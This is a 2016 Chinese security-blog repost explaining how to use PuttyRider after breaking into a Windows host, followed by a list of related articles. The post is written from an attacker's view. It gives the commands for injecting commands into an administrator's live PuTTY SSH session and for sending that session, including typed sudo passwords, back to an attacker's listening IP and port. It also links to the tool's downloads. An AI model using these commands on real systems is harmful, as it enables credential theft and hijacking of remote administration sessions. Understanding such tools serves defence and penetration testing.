Putty的噩梦——渗透工具PuttyRider使用心得分享

标签: putty 噩梦 渗透 | 发表时间:2016-05-18 19:39 | 作者:hetaoo
出处:http://www.iteye.com

近日,我们的360监控平台,检测到一个叫PuttyRider渗透工具,小编立马下回来研究,整理一篇工具的使用心得分享给大家。

我们在入侵到一台主机的时候,经常会看到管理员的桌面会放着putty.exe,这说明有很大的可能性管理员是使用putty远程管理主机的。该工具主要是针对SSH客户端putty的利用,采用DLL注入的方式,来实现各种猥琐的利用姿势。我依次演示该工具的三种利用场景

1.当你远程控制对方主机的时候,管理员正好用putty连接着远程主机

这种情景,我们只要直接注入命令到当前的putty进程,就可以利用,非常简单,缺点是没有回显。

t01ce4f3afcf47b04d3.jpg

使用puttyRider.exe –l 查看当前进程中putty正在连接的远程主机信息,这里不光能得到远程主机的IP地址和putty进程号,还能在Injected列看到当前是NO,说明我们还没有进程注入。

t01384d89895aa86a3c.jpg

我们使用puttyrider.exe –p 0 –f –c ifconfig,就把ifconfig命令注入到当前的putty会话了,就达到远程命令执行的目的了。再次puttyRider.exe –l 看一下,发现injected列是yes了,说明我们注入进程成功了。

t01aa1aa8be052a81f8.jpg

2.使用反弹的方式实时看管理员的输入

除了利用第一种方法直接注入命令,我们还可以反弹出来,实时看到对方管理员在putty里的输入,即使管理输入sudo这种命令,我们也能够看到他输入的明文密码。但是这种利用的前提是,对方管理员正在用PUTTY连接的主机可以反弹到你监听的IP地址,防火墙限制的不是很严。

t01a5e3207ba4897591.jpg

Puttyrider.exe –p 0 –r 我监听的IP:端口

执行后,我们就可以看到结果了

t0183fd6fe50fa2129d.jpg

3.我运气不这么好,对方管理员当前没有正在使用PUTTY管理远程主机

这种情况应该最常见了,软件作者也考虑到了,给我们提供了-w参数,他会让puttyrider后台监视新起来的进程,然后反弹到我们的主机,也能实时的看到对方的操作哦,包括输入的账号

http://p2.qhimg.com/t01b10f9dd71aac0fe4.jpg

Puttyrider.exe –w –r 我监听的IP:端口号

当执行完这个命令后,只要管理员下次再次开启PUTTY的时候,我们就能在监听的9999端口看到她的SHELL了

http://p0.qhimg.com/t017f16d0d851ca333d.jpg

最后如果想研究工具细节的童鞋,可以在

https://codeload.github.com/seastorm/PuttyRider/zip/master下载源码,深入学习 :)

编译好的二进制文件可以在

https://github.com/seastorm/PuttyRider/releases/download/0.1/PuttyRider-bin.zip下载

 

 

本文由 360安全播报 原创发布,如需转载请注明来源及本文地址。



已有 0 人发表留言,猛击->> 这里<<-参与讨论


ITeye推荐



相关 [putty 噩梦 渗透] 推荐:

Putty的噩梦——渗透工具PuttyRider使用心得分享

- - 行业应用 - ITeye博客
近日,我们的360监控平台,检测到一个叫PuttyRider渗透工具,小编立马下回来研究,整理一篇工具的使用心得分享给大家. 我们在入侵到一台主机的时候,经常会看到管理员的桌面会放着putty.exe,这说明有很大的可能性管理员是使用putty远程管理主机的. 该工具主要是针对SSH客户端putty的利用,采用DLL注入的方式,来实现各种猥琐的利用姿势.

PuTTY 0.61发布

- Larry Li - Solidot
经历四年开发之后,PuTTY的版本号从0.60增加到了0.61. PuTTY是开源终端模拟器,可用作Telnet/SSH/rlogin/纯TCP以及串行阜的客户端. 0.61主要是修正bug,改进性能,增加新特性,支持GSSAPI SSH2认证,更快的SSH密钥交换,兼容Windows 7,支持Win7的Jump List,等等.

InucurryFont,噩梦字体

- 季季 - 比特客栈的文艺复兴
为什么字体名称不是Incubator. 因为魔法少女小圆并不是Gekidan Inu Curry(劇団イヌカレー)第一次使用这种字体. 请见天元突破官方小剧场之オレノ×××ハウチュウヒトツ. 下载来源,本地下载,字体研究.

【转载】紧急:中文版putty、WinSCP、SSH Secure后门!请立即更新

- - 素包子
原文在http://www.youxia.org/2012/01/putty-WinSCP-SecureCRT-Backdoor.html 我再加个图 我曾经有一个朋友的服务器就是出现了下面说的1 3 4的问题,终于找到源头了. 凡是使用中文版putty、WinSCP、SSH Secure的用户请注意,它们很可能带有病毒,会导致root密码被盗走,进而盗取或破坏数据,利用服务器发攻击包等.

噩梦背后的秘密

- JR - 译言-每日精品译文推荐
来源The deep meaning of nightmares.        噩梦,正如坠入地狱一样的恐怖,它的存在有意义吗. 没人能逃脱噩梦的魔爪,噩梦为我们敲醒了警钟,而不是带来了伤害. 我们不能忽视它们,更不能不回忆所做过的噩梦. 噩梦是痛苦的,但同时也是必须的治疗药品. 通过这样的情感发泄,它们可以起到很重要的治愈作用,同时警告我们不曾留意的心理失衡状态.

[警告]部分汉化 PuTTY 和 WinSCP 软件存在后门 | 小众软件 > 日志

- - 小众软件 - Appinn
据可靠消息,目前国内部分汉化版 PuTTY、WinSCP、SSH Secure 软件存在后门,会恶意泄漏用户名、密码等信息,并导致服务器被攻击. 请立即停止使用不可靠的汉化版或中文版相关软件,并重新从官方地址下载. 这也是小众始终推荐从官方下载软件的原因之一,安全无小事. PuTTY 官网: http://www.chiark.greenend.org.uk/~sgtatham/putty/.

再谈内网渗透

- - FreebuF.COM
前言: 看了@g.r0b1n文章《浅谈内网渗透》抑制不住自己冲动的心情,写一篇《再谈内网渗透》,希望以后有朋友能更新《详谈内网渗透》 在我的脑子里面我始终认为,一次渗透至少要控制被渗透对象80%以上服务器才能算得上一次成功的渗透. 正文: 我没有内网域里面某个机器的权限,我只有一个存在漏洞的web页面,而我的目的就利用这个存在漏洞的web入侵线上服务器,然后从IDC网络入侵到办公网,到了办公网络再入侵域控服务器,很多较大的互联网公司IDC内网与运维网相通的,然而运维内网一般包含在办公网络中.

现代API渗透技术

- -
API 有多种不同的形式,攻击 API 的方法会因这些形式的不同而有很大差异. 在一篇文章中涵盖所有攻击类型是不可能的,下面我重点介绍其中一部分. 与 Web 应用程序非常相似,API 可以具有不同级别的可见性. 有些可以通过互联网访问,而有些则只能在内部使用. API 攻击方式之一就是简单地访问你应该无法访问的 API.

结对编程——我的噩梦

- - 博客园_知识库
   英文原文: Pair Programming - My Personal Nightmare.   自从 极限编程诞生起,我就一直在听说结对编程是个 好东西. 所有的敏捷传教士们都在告诉我们:结对编程能提高代码质量,有助知识共享,甚至激发开发效率,同时,还能深度拉近程序员之间的感情关系(参看 拥抱编程).

[笑话连篇] 央行加息 银行柜员的噩梦 噩梦!!!! (转载)

- liangzi9 - 水木社区 今日十大热门话题
发信人: xyhou (逍遥侯), 信区: Joke. 标 题: 央行加息 银行柜员的噩梦 噩梦. 发信站: 水木社区 (Wed Apr 6 10:26:10 2011), 站内. 【 以下文字转载自 MyWallet 讨论区 】. 发信人: JJxDD (~反指悲催不卖不涨不空不跌帝~), 信区: MyWallet.